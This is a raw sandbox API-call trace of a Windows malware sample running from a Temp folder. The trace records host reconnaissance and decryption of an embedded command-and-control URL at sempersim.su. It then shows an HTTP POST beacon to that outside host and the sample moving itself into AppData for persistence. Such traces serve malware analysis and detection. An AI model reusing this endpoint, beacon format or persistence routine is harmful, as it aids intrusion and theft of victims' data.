[0319.494] GetProcessHeap () returned 0x780000 [0319.494] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x11c) returned 0x79a550 [0319.495] RtlGetVersion (in: lpVersionInformation=0x79a550 | out: lpVersionInformation=0x79a550*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 0x0 [0319.495] GetProcessHeap () returned 0x780000 [0319.496] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a550 | out: hHeap=0x780000) returned 1 [0319.497] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19fb18 | out: lpSystemTimeAsFileTime=0x19fb18*(dwLowDateTime=0xc70f447, dwHighDateTime=0x1d85fcb)) [0319.497] GetProcessHeap () returned 0x780000 [0319.497] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x7) returned 0x79b4f0 [0319.497] GetProcessHeap () returned 0x780000 [0319.497] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79d290 [0319.498] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.498] GetUserNameW (in: lpBuffer=0x79d290, pcbBuffer=0x19fb74 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x19fb74) returned 1 [0319.499] GetProcessHeap () returned 0x780000 [0319.499] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79d290 | out: hHeap=0x780000) returned 1 [0319.499] GetProcessHeap () returned 0x780000 [0319.499] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79d290 [0319.499] GetComputerNameW (in: lpBuffer=0x79d290, nSize=0x19fb74 | out: lpBuffer="XC64ZB", nSize=0x19fb74) returned 1 [0319.499] GetProcessHeap () returned 0x780000 [0319.500] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79d290 | out: hHeap=0x780000) returned 1 [0319.500] GetCurrentThread () returned 0xfffffffe [0319.501] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.501] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=1, TokenHandle=0x19fb74 | out: TokenHandle=0x19fb74*=0x0) returned 0 [0319.502] GetLastError () returned 0x3f0 [0319.502] GetCurrentProcess () returned 0xffffffff [0319.502] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.503] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x19fb74 | out: TokenHandle=0x19fb74*=0x254) returned 1 [0319.503] GetProcessHeap () returned 0x780000 [0319.503] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79d290 [0319.503] GetProcessHeap () returned 0x780000 [0319.503] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x7a1ce8 [0319.503] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.504] GetTokenInformation (in: TokenHandle=0x254, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x19fb70 | out: TokenInformation=0x0, ReturnLength=0x19fb70) returned 0 [0319.504] GetProcessHeap () returned 0x780000 [0319.504] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x24) returned 0x798b40 [0319.505] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.505] GetTokenInformation (in: TokenHandle=0x254, TokenInformationClass=0x1, TokenInformation=0x798b40, TokenInformationLength=0x24, ReturnLength=0x19fb70 | out: TokenInformation=0x798b40, ReturnLength=0x19fb70) returned 1 [0319.506] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.506] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x798b48*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), Name=0x79d290, cchName=0x19fb60, ReferencedDomainName=0x7a1ce8, cchReferencedDomainName=0x19fb64, peUse=0x19fb5c | out: Name="RDhJ0CNFevzX", cchName=0x19fb60, ReferencedDomainName="XC64ZB", cchReferencedDomainName=0x19fb64, peUse=0x19fb5c) returned 1 [0319.508] GetProcessHeap () returned 0x780000 [0319.508] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f44) returned 0x7a43d0 [0319.509] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0319.510] wvsprintfW (in: param_1=0x7a43d0, param_2="%s", arglist=0x19fb4c | out: param_1="XC64ZB") returned 6 [0319.510] GetProcessHeap () returned 0x780000 [0319.510] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x10) returned 0x79e948 [0319.510] GetProcessHeap () returned 0x780000 [0319.510] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7a43d0 | out: hHeap=0x780000) returned 1 [0319.510] GetProcessHeap () returned 0x780000 [0319.511] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798b40 | out: hHeap=0x780000) returned 1 [0319.511] CloseHandle (hObject=0x254) returned 1 [0319.511] GetProcessHeap () returned 0x780000 [0319.512] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7a1ce8 | out: hHeap=0x780000) returned 1 [0319.512] GetProcessHeap () returned 0x780000 [0319.512] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79d290 | out: hHeap=0x780000) returned 1 [0319.512] GetProcessHeap () returned 0x780000 [0319.512] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79e948 | out: hHeap=0x780000) returned 1 [0319.513] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0319.513] GetDesktopWindow () returned 0x10010 [0319.514] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0319.514] GetWindowRect (in: hWnd=0x10010, lpRect=0x19fb68 | out: lpRect=0x19fb68) returned 1 [0319.516] GetProcessHeap () returned 0x780000 [0319.516] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x8) returned 0x79b410 [0319.516] GetProcessHeap () returned 0x780000 [0319.516] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b410 | out: hHeap=0x780000) returned 1 [0319.517] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.517] GetUserNameW (in: lpBuffer=0x19f968, pcbBuffer=0x19fb70 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x19fb70) returned 1 [0319.518] LoadLibraryW (lpLibFileName="NETAPI32") returned 0x74d00000 [0319.519] GetProcAddress (hModule=0x74d00000, lpProcName="NetUserGetInfo") returned 0x744833a0 [0319.519] NetUserGetInfo (in: servername=0x0, username="RDhJ0CNFevzX", level=0x1, bufptr=0x19fb74 | out: bufptr=0x7a3100*(usri1_name="RDhJ0CNFevzX", usri1_password=0x0, usri1_password_age=0xad907, usri1_priv=0x2, usri1_home_dir="", usri1_comment="", usri1_flags=0x10201, usri1_script_path="")) returned 0x0 [0319.524] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.524] AllocateAndInitializeSid (in: pIdentifierAuthority=0x19fb60, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x19fb68 | out: pSid=0x19fb68*=0x79e990*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0319.524] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.525] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x79e990*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x19fb6c | out: IsMember=0x19fb6c) returned 1 [0319.525] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.526] GetNativeSystemInfo (in: lpSystemInfo=0x19fb44 | out: lpSystemInfo=0x19fb44*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0319.526] GetProcessHeap () returned 0x780000 [0319.526] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x40) returned 0x7a3388 [0319.527] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.527] CryptAcquireContextW (in: phProv=0x19f920, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f920*=0x0) returned 1 [0319.537] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.538] CryptAcquireContextW (in: phProv=0x19f920, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f920*=0x79cab8) returned 1 [0319.544] GetProcessHeap () returned 0x780000 [0319.544] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x24) returned 0x7989c0 [0319.545] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.545] CryptImportKey (in: hProv=0x79cab8, pbData=0x7989c0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f924 | out: phKey=0x19f924*=0x78d6c8) returned 1 [0319.545] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.546] CryptSetKeyParam (hKey=0x78d6c8, dwParam=0x4, pbData=0x19f91c*=0x1, dwFlags=0x0) returned 1 [0319.546] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.546] CryptSetKeyParam (hKey=0x78d6c8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0319.547] GetProcessHeap () returned 0x780000 [0319.547] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7989c0 | out: hHeap=0x780000) returned 1 [0319.547] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.548] CryptDecrypt (in: hKey=0x78d6c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x7a3388, pdwDataLen=0x19f974 | out: pbData=0x7a3388, pdwDataLen=0x19f974) returned 1 [0319.548] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.549] CryptDestroyKey (hKey=0x78d6c8) returned 1 [0319.549] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.549] CryptReleaseContext (hProv=0x79cab8, dwFlags=0x0) returned 1 [0319.549] GetProcessHeap () returned 0x780000 [0319.549] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x212) returned 0x79d290 [0319.550] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0319.550] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x99ÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0319.551] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0319.551] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x99ÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0319.552] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0319.552] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x99ÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0319.552] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0319.553] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x99ÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0319.553] GetProcessHeap () returned 0x780000 [0319.553] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x20) returned 0x793288 [0319.553] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x99ÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f930*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f950 | out: ppResult=0x19f950*=0x0) returned 11001 [0319.597] GetProcessHeap () returned 0x780000 [0319.598] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x793288 | out: hHeap=0x780000) returned 1 [0319.598] GetProcessHeap () returned 0x780000 [0319.598] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79d290 | out: hHeap=0x780000) returned 1 [0319.598] GetProcessHeap () returned 0x780000 [0319.598] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7a3388 | out: hHeap=0x780000) returned 1 [0319.598] GetProcessHeap () returned 0x780000 [0319.598] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x40) returned 0x7a2c38 [0319.599] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.599] CryptAcquireContextW (in: phProv=0x19f920, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f920*=0x0) returned 1 [0319.604] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.604] CryptAcquireContextW (in: phProv=0x19f920, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f920*=0x79cab8) returned 1 [0319.619] GetProcessHeap () returned 0x780000 [0319.619] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x24) returned 0x7987e0 [0319.619] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.620] CryptImportKey (in: hProv=0x79cab8, pbData=0x7987e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f924 | out: phKey=0x19f924*=0x78d6c8) returned 1 [0319.620] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.621] CryptSetKeyParam (hKey=0x78d6c8, dwParam=0x4, pbData=0x19f91c*=0x1, dwFlags=0x0) returned 1 [0319.621] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.622] CryptSetKeyParam (hKey=0x78d6c8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0319.622] GetProcessHeap () returned 0x780000 [0319.622] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7987e0 | out: hHeap=0x780000) returned 1 [0319.623] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.623] CryptDecrypt (in: hKey=0x78d6c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x7a2c38, pdwDataLen=0x19f974 | out: pbData=0x7a2c38, pdwDataLen=0x19f974) returned 1 [0319.624] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.624] CryptDestroyKey (hKey=0x78d6c8) returned 1 [0319.624] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.625] CryptReleaseContext (hProv=0x79cab8, dwFlags=0x0) returned 1 [0319.625] GetProcessHeap () returned 0x780000 [0319.625] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x212) returned 0x79d290 [0319.625] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0319.626] StrStrA (lpFirst="http://sempersim.su/gf3/fre.php", lpSrch="http://") returned="http://sempersim.su/gf3/fre.php" [0319.626] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0319.627] StrStrA (lpFirst="sempersim.su/gf3/fre.php", lpSrch="/") returned="/gf3/fre.php" [0319.627] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0319.628] StrStrA (lpFirst="sempersim.su/gf3/fre.php", lpSrch=":") returned 0x0 [0319.628] GetProcessHeap () returned 0x780000 [0319.628] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x20) returned 0x793288 [0319.628] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19f930*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f950 | out: ppResult=0x19f950*=0x793080*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x79eac8*(sa_family=2, sin_port=0x50, sin_addr="88.218.168.92"), ai_next=0x0)) returned 0 [0319.634] GetProcessHeap () returned 0x780000 [0319.634] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b490 [0319.634] socket (af=2, type=1, protocol=6) returned 0x264 [0319.635] connect (s=0x264, name=0x79eac8*(sa_family=2, sin_port=0x50, sin_addr="88.218.168.92"), namelen=16) returned 0 [0319.664] FreeAddrInfoW (pAddrInfo=0x793080*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x79eac8*(sa_family=2, sin_port=0x50, sin_addr="88.218.168.92"), ai_next=0x0)) [0319.664] GetProcessHeap () returned 0x780000 [0319.664] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x7d) returned 0x79cab8 [0319.664] GetProcessHeap () returned 0x780000 [0319.664] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x201b) returned 0x7a43d0 [0319.664] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0319.665] wvsprintfA (in: param_1=0x7a43d0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f958 | out: param_1="POST /gf3/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0319.665] GetProcessHeap () returned 0x780000 [0319.665] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xad) returned 0x79a648 [0319.665] GetProcessHeap () returned 0x780000 [0319.666] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7a43d0 | out: hHeap=0x780000) returned 1 [0319.666] GetProcessHeap () returned 0x780000 [0319.666] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3e) returned 0x7a2e30 [0319.666] GetProcessHeap () returned 0x780000 [0319.666] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x1fdc) returned 0x7a43d0 [0319.668] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0319.669] wvsprintfA (in: param_1=0x7a43d0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f958 | out: param_1="POST /gf3/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 1234DF8C\r\nContent-Length: 186\r\nConnection: close\r\n\r\n") returned 236 [0319.669] GetProcessHeap () returned 0x780000 [0319.669] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xee) returned 0x7a1ce8 [0319.669] GetProcessHeap () returned 0x780000 [0319.669] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7a43d0 | out: hHeap=0x780000) returned 1 [0319.669] send (s=0x264, buf=0x7a1ce8*, len=236, flags=0) returned 236 [0319.670] send (s=0x264, buf=0x79b520*, len=186, flags=0) returned 186 [0319.670] GetProcessHeap () returned 0x780000 [0319.670] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xfd0) returned 0x7a43d0 [0319.670] recv (in: s=0x264, buf=0x7a43d0, len=4048, flags=0 | out: buf=0x7a43d0*) returned 229 [0320.170] GetProcessHeap () returned 0x780000 [0320.170] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7a1ce8 | out: hHeap=0x780000) returned 1 [0320.170] GetProcessHeap () returned 0x780000 [0320.170] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7a2e30 | out: hHeap=0x780000) returned 1 [0320.170] GetProcessHeap () returned 0x780000 [0320.171] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a648 | out: hHeap=0x780000) returned 1 [0320.171] GetProcessHeap () returned 0x780000 [0320.171] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79cab8 | out: hHeap=0x780000) returned 1 [0320.171] closesocket (s=0x264) returned 0 [0320.171] GetProcessHeap () returned 0x780000 [0320.171] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b490 | out: hHeap=0x780000) returned 1 [0320.171] GetProcessHeap () returned 0x780000 [0320.172] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79d290 | out: hHeap=0x780000) returned 1 [0320.172] GetProcessHeap () returned 0x780000 [0320.172] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7a2c38 | out: hHeap=0x780000) returned 1 [0320.172] GetProcessHeap () returned 0x780000 [0320.172] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x793288 | out: hHeap=0x780000) returned 1 [0320.172] GetProcessHeap () returned 0x780000 [0320.172] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7a43d0 | out: hHeap=0x780000) returned 1 [0320.172] GetProcessHeap () returned 0x780000 [0320.173] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b520 | out: hHeap=0x780000) returned 1 [0320.173] GetProcessHeap () returned 0x780000 [0320.173] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79e930 | out: hHeap=0x780000) returned 1 [0320.173] GetProcessHeap () returned 0x780000 [0320.173] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b4f0 | out: hHeap=0x780000) returned 1 [0320.173] GetProcessHeap () returned 0x780000 [0320.173] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x794fe8 | out: hHeap=0x780000) returned 1 [0320.173] GetProcessHeap () returned 0x780000 [0320.173] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79ea08 | out: hHeap=0x780000) returned 1 [0320.173] GetProcessHeap () returned 0x780000 [0320.173] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79d290 [0320.173] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x79d290, nSize=0x103 | out: lpFilename="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dehbibhar.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\dehbibhar.exe")) returned 0x32 [0320.174] GetProcessHeap () returned 0x780000 [0320.174] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x7a2628 [0320.174] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0320.175] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x7a2628 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0320.175] GetProcessHeap () returned 0x780000 [0320.175] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f58) returned 0x7a43d0 [0320.176] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0320.176] wvsprintfW (in: param_1=0x7a43d0, param_2="%s\\%s\\%s.exe", arglist=0x19fd44 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.exe") returned 55 [0320.176] GetProcessHeap () returned 0x780000 [0320.176] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x72) returned 0x797710 [0320.176] GetProcessHeap () returned 0x780000 [0320.177] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7a43d0 | out: hHeap=0x780000) returned 1 [0320.178] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0320.178] StrStrW (lpFirst="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dehbibhar.exe", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.exe") returned 0x0 [0320.178] GetProcessHeap () returned 0x780000 [0320.178] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f4a) returned 0x7a43d0 [0320.179] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0320.179] wvsprintfW (in: param_1=0x7a43d0, param_2="%s\\%s", arglist=0x19fd60 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9") returned 44 [0320.179] GetProcessHeap () returned 0x780000 [0320.179] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x5c) returned 0x79d780 [0320.179] GetProcessHeap () returned 0x780000 [0320.180] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7a43d0 | out: hHeap=0x780000) returned 1 [0320.180] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9")) returned 0x10 [0320.181] MoveFileExW (lpExistingFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dehbibhar.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\dehbibhar.exe"), lpNewFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9\\9bdc8a.exe"), dwFlags=0x1) returned 1 [0320.182] GetProcessHeap () returned 0x780000 [0320.182] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x7a2050 [0320.183] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0320.183] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x7a2050 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0320.184] GetProcessHeap () returned 0x780000 [0320.184] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f4a) returned 0x7a43d0 [0320.184] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0320.185] wvsprintfW (in: param_1=0x7a43d0, param_2="%s\\%s", arglist=0x19fb48 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9") returned 44 [0320.185] GetProcessHeap () returned 0x780000 [0320.185] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x5c) returned 0x7a2838 [0320.185] GetProcessHeap () returned 0x780000 [0320.185] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7a43d0 | out: hHeap=0x780000) returned 1 [0320.186] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9")) returned 0x10 [0320.186] GetProcessHeap () returned 0x780000 [0320.186] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f50) returned 0x7a43d0 [0320.187] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0320.187] wvsprintfW (in: param_1=0x7a43d0, param_2="%s\\%s.%s", arglist=0x19fb5c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.exe") returned 55 [0320.188] GetProcessHeap () returned 0x780000 [0320.188] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x72) returned 0x797190 [0320.188] GetProcessHeap () returned 0x780000 [0320.188] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7a43d0 | out: hHeap=0x780000) returned 1 [0320.188] GetProcessHeap () returned 0x780000 [0320.188] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7a2838 | out: hHeap=0x780000) returned 1 [0320.188] GetProcessHeap () returned 0x780000 [0320.189] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7a2050 | out: hHeap=0x780000) returned 1 [0320.189] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 